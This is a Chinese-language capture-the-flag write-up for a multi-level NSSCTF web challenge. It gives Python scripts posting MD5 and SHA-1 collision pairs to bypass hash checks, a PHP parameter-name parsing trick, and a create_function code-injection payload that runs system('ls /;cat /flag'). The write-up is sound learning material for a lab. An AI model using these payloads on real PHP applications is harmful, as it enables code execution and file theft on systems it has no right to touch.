题目链接
level 1
level 2
md5碰撞
1 2 3 4 5 6 7 8 9 10 11 12 13 14
| import requests post_data = { "array1": b'\x0e\x30\x65\x61\x55\x9a\xa7\x87\xd0\x0b\xc6\xf7\x0b\xbd' b'\xfe\x34\x04\xcf\x03\x65\x9e\x74\x4f\x85\x34\xc0\x0f\xfb' b'\x65\x9c\x4c\x87\x40\xcc\x94\x2f\xeb\x2d\xa1\x15\xa3\xf4' b'\x15\xdc\xbb\x86\x07\x49\x73\x86\x65\x6d\x7d\x1f\x34\xa4' b'\x20\x59\xd7\x8f\x5a\x8d\xd1\xef', "array2": b'\x0e\x30\x65\x61\x55\x9a\xa7\x87\xd0\x0b\xc6\xf7\x0b\xbd' b'\xfe\x34\x04\xcf\x03\x65\x9e\x70\x4f\x85\x34\xc0\x0f\xfb' b'\x65\x9c\x4c\x87\x40\xcc\x94\x2f\xeb\x2d\xa1\x15\xa3\xf4' b'\x15\x5c\xbb\x86\x07\x49\x73\x86\x65\x6d\x7d\x1f\x34\xa4' b'\x20\x59\xd7\x8f\x5a\x8d\xd1\xef'} response = requests.post("http://node3.anna.nssctf.cn:28905/level_2_1s_h3re.php", data=post_data) print(response.text)
|
level 3
sha1碰撞
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87
| import requests post_data = { "array1": b'\x99\x04\x0d\x04\x7f\xe8\x17\x80\x01\x20\x00\xff\x4b\x65\x79\x20' b'\x69\x73\x20\x70\x61\x72\x74\x20\x6f\x66\x20\x61\x20\x63\x6f\x6c' b'\x6c\x69\x73\x69\x6f\x6e\x21\x20\x49\x74\x27\x73\x20\x61\x20\x74' b'\x72\x61\x70\x21\x79\xc6\x1a\xf0\xaf\xcc\x05\x45\x15\xd9\x27\x4e' b'\x73\x07\x62\x4b\x1d\xc7\xfb\x23\x98\x8b\xb8\xde\x8b\x57\x5d\xba' b'\x7b\x9e\xab\x31\xc1\x67\x4b\x6d\x97\x43\x78\xa8\x27\x73\x2f\xf5' b'\x85\x1c\x76\xa2\xe6\x07\x72\xb5\xa4\x7c\xe1\xea\xc4\x0b\xb9\x93' b'\xc1\x2d\x8c\x70\xe2\x4a\x4f\x8d\x5f\xcd\xed\xc1\xb3\x2c\x9c\xf1' b'\x9e\x31\xaf\x24\x29\x75\x9d\x42\xe4\xdf\xdb\x31\x71\x9f\x58\x76' b'\x23\xee\x55\x29\x39\xb6\xdc\xdc\x45\x9f\xca\x53\x55\x3b\x70\xf8' b'\x7e\xde\x30\xa2\x47\xea\x3a\xf6\xc7\x59\xa2\xf2\x0b\x32\x0d\x76' b'\x0d\xb6\x4f\xf4\x79\x08\x4f\xd3\xcc\xb3\xcd\xd4\x83\x62\xd9\x6a' b'\x9c\x43\x06\x17\xca\xff\x6c\x36\xc6\x37\xe5\x3f\xde\x28\x41\x7f' b'\x62\x6f\xec\x54\xed\x79\x43\xa4\x6e\x5f\x57\x30\xf2\xbb\x38\xfb' b'\x1d\xf6\xe0\x09\x00\x10\xd0\x0e\x24\xad\x78\xbf\x92\x64\x19\x93' b'\x60\x8e\x8d\x15\x8a\x78\x9f\x34\xc4\x6f\xe1\xe6\x02\x7f\x35\xa4' b'\xcb\xfb\x82\x70\x76\xc5\x0e\xca\x0e\x8b\x7c\xca\x69\xbb\x2c\x2b' b'\x79\x02\x59\xf9\xbf\x95\x70\xdd\x8d\x44\x37\xa3\x11\x5f\xaf\xf7' b'\xc3\xca\xc0\x9a\xd2\x52\x66\x05\x5c\x27\x10\x47\x55\x17\x8e\xae' b'\xff\x82\x5a\x2c\xaa\x2a\xcf\xb5\xde\x64\xce\x76\x41\xdc\x59\xa5' b'\x41\xa9\xfc\x9c\x75\x67\x56\xe2\xe2\x3d\xc7\x13\xc8\xc2\x4c\x97' b'\x90\xaa\x6b\x0e\x38\xa7\xf5\x5f\x14\x45\x2a\x1c\xa2\x85\x0d\xdd' b'\x95\x62\xfd\x9a\x18\xad\x42\x49\x6a\xa9\x70\x08\xf7\x46\x72\xf6' b'\x8e\xf4\x61\xeb\x88\xb0\x99\x33\xd6\x26\xb4\xf9\x18\x74\x9c\xc0' b'\x27\xfd\xdd\x6c\x42\x5f\xc4\x21\x68\x35\xd0\x13\x4d\x15\x28\x5b' b'\xab\x2c\xb7\x84\xa4\xf7\xcb\xb4\xfb\x51\x4d\x4b\xf0\xf6\x23\x7c' b'\xf0\x0a\x9e\x9f\x13\x2b\x9a\x06\x6e\x6f\xd1\x7f\x6c\x42\x98\x74' b'\x78\x58\x6f\xf6\x51\xaf\x96\x74\x7f\xb4\x26\xb9\x87\x2b\x9a\x88' b'\xe4\x06\x3f\x59\xbb\x33\x4c\xc0\x06\x50\xf8\x3a\x80\xc4\x27\x51' b'\xb7\x19\x74\xd3\x00\xfc\x28\x19\xa2\xe8\xf1\xe3\x2c\x1b\x51\xcb' b'\x18\xe6\xbf\xc4\xdb\x9b\xae\xf6\x75\xd4\xaa\xf5\xb1\x57\x4a\x04' b'\x7f\x8f\x6d\xd2\xec\x15\x3a\x93\x41\x22\x93\x97\x4d\x92\x8f\x88' b'\xce\xd9\x36\x3c\xfe\xf9\x7c\xe2\xe7\x42\xbf\x34\xc9\x6b\x8e\xf3' b'\x87\x56\x76\xfe\xa5\xcc\xa8\xe5\xf7\xde\xa0\xba\xb2\x41\x3d\x4d' b'\xe0\x0e\xe7\x1e\xe0\x1f\x16\x2b\xdb\x6d\x1e\xaf\xd9\x25\xe6\xae' b'\xba\xae\x6a\x35\x4e\xf1\x7c\xf2\x05\xa4\x04\xfb\xdb\x12\xfc\x45' b'\x4d\x41\xfd\xd9\x5c\xf2\x45\x96\x64\xa2\xad\x03\x2d\x1d\xa6\x0a' b'\x73\x26\x40\x75\xd7\xf1\xe0\xd6\xc1\x40\x3a\xe7\xa0\xd8\x61\xdf' b'\x3f\xe5\x70\x71\x88\xdd\x5e\x07\xd1\x58\x9b\x9f\x8b\x66\x30\x55' b'\x3f\x8f\xc3\x52\xb3\xe0\xc2\x7d\xa8\x0b\xdd\xba\x4c\x64\x02\x0d',
"array2": b'\x99\x03\x0d\x04\x7f\xe8\x17\x80\x01\x18\x00\xff\x50\x72\x61\x63' b'\x74\x69\x63\x61\x6c\x20\x53\x48\x41\x2d\x31\x20\x63\x68\x6f\x73' b'\x65\x6e\x2d\x70\x72\x65\x66\x69\x78\x20\x63\x6f\x6c\x6c\x69\x73' b'\x69\x6f\x6e\x21\x1d\x27\x6c\x6b\xa6\x61\xe1\x04\x0e\x1f\x7d\x76' b'\x7f\x07\x62\x49\xdd\xc7\xfb\x33\x2c\x8b\xb8\xc2\xb7\x57\x5d\xbe' b'\xc7\x9e\xab\x2b\xe1\x67\x4b\x7d\xb3\x43\x78\xb4\xcb\x73\x2f\xe1' b'\x89\x1c\x76\xa0\x26\x07\x72\xa5\x10\x7c\xe1\xf6\xe8\x0b\xb9\x97' b'\x7d\x2d\x8c\x68\x52\x4a\x4f\x9d\x5f\xcd\xed\xcd\x0b\x2c\x9c\xe1' b'\x92\x31\xaf\x26\xe9\x75\x9d\x52\x50\xdf\xdb\x2d\x4d\x9f\x58\x72' b'\x9f\xee\x55\x33\x19\xb6\xdc\xcc\x61\x9f\xca\x4f\xb9\x3b\x70\xec' b'\x72\xde\x30\xa0\x87\xea\x3a\xe6\x73\x59\xa2\xee\x27\x32\x0d\x72' b'\xb1\xb6\x4f\xec\xc9\x08\x4f\xc3\xcc\xb3\xcd\xd8\x3b\x62\xd9\x7a' b'\x90\x43\x06\x15\x0a\xff\x6c\x26\x72\x37\xe5\x23\xe2\x28\x41\x7b' b'\xde\x6f\xec\x4e\xcd\x79\x43\xb4\x4a\x5f\x57\x2c\x1e\xbb\x38\xef' b'\x11\xf6\xe0\x0b\xc0\x10\xd0\x1e\x90\xad\x78\xa3\xbe\x64\x19\x97' b'\xdc\x8e\x8d\x0d\x3a\x78\x9f\x24\xc4\x6f\xe1\xea\xba\x7f\x35\xb4' b'\xc7\xfb\x82\x72\xb6\xc5\x0e\xda\xba\x8b\x7c\xd6\x55\xbb\x2c\x2f' b'\xc5\x02\x59\xe3\x9f\x95\x70\xcd\xa9\x44\x37\xbf\xfd\x5f\xaf\xe3' b'\xcf\xca\xc0\x98\x12\x52\x66\x15\xe8\x27\x10\x5b\x79\x17\x8e\xaa' b'\x43\x82\x5a\x34\x1a\x2a\xcf\xa5\xde\x64\xce\x7a\xf9\xdc\x59\xb5' b'\x4d\xa9\xfc\x9e\xb5\x67\x56\xf2\x56\x3d\xc7\x0f\xf4\xc2\x4c\x93' b'\x2c\xaa\x6b\x14\x18\xa7\xf5\x4f\x30\x45\x2a\x00\x4e\x85\x0d\xc9' b'\x99\x62\xfd\x98\xd8\xad\x42\x59\xde\xa9\x70\x14\xdb\x46\x72\xf2' b'\x32\xf4\x61\xf3\x38\xb0\x99\x23\xd6\x26\xb4\xf5\xa0\x74\x9c\xd0' b'\x2b\xfd\xdd\x6e\x82\x5f\xc4\x31\xdc\x35\xd0\x0f\x71\x15\x28\x5f' b'\x17\x2c\xb7\x9e\x84\xf7\xcb\xa4\xdf\x51\x4d\x57\x1c\xf6\x23\x68' b'\xfc\x0a\x9e\x9d\xd3\x2b\x9a\x16\xda\x6f\xd1\x63\x40\x42\x98\x70' b'\xc4\x58\x6f\xee\xe1\xaf\x96\x64\x7f\xb4\x26\xb5\x3f\x2b\x9a\x98' b'\xe8\x06\x3f\x5b\x7b\x33\x4c\xd0\xb2\x50\xf8\x26\xbc\xc4\x27\x55' b'\x0b\x19\x74\xc9\x20\xfc\x28\x09\x86\xe8\xf1\xff\xc0\x1b\x51\xdf' b'\x14\xe6\xbf\xc6\x1b\x9b\xae\xe6\xc1\xd4\xaa\xe9\x9d\x57\x4a\x00' b'\xc3\x8f\x6d\xca\x5c\x15\x3a\x83\x41\x22\x93\x9b\xf5\x92\x8f\x98' b'\xc2\xd9\x36\x3e\x3e\xf9\x7c\xf2\x53\x42\xbf\x28\xf5\x6b\x8e\xf7' b'\x3b\x56\x76\xe4\x85\xcc\xa8\xf5\xd3\xde\xa0\xa6\x5e\x41\x3d\x59' b'\xec\x0e\xe7\x1c\x20\x1f\x16\x3b\x6f\x6d\x1e\xb3\xf5\x25\xe6\xaa' b'\x06\xae\x6a\x2d\xfe\xf1\x7c\xe2\x05\xa4\x04\xf7\x63\x12\xfc\x55' b'\x41\x41\xfd\xdb\x9c\xf2\x45\x86\xd0\xa2\xad\x1f\x11\x1d\xa6\x0e' b'\xcf\x26\x40\x6f\xf7\xf1\xe0\xc6\xe5\x40\x3a\xfb\x4c\xd8\x61\xcb' b'\x33\xe5\x70\x73\x48\xdd\x5e\x17\x65\x58\x9b\x83\xa7\x66\x30\x51' b'\x83\x8f\xc3\x4a\x03\xe0\xc2\x6d\xa8\x0b\xdd\xb6\xf4\x64\x02\x1d'} response = requests.post("http://node3.anna.nssctf.cn:28905/Level___3.php", data=post_data) print(response.text)
|
level 4
php的变量解析绕过, php会把请求参数中的非法字符转为下划线
1
| /level_level_4.php?NI+SA+=txw4ever
|
level 5
由$a('',$b);
想到应该是用create_function
,但是不能以字母数字开头,前加\
1
| /55_5_55.php?a=\create_function&b=}system('ls /;cat /flag');
|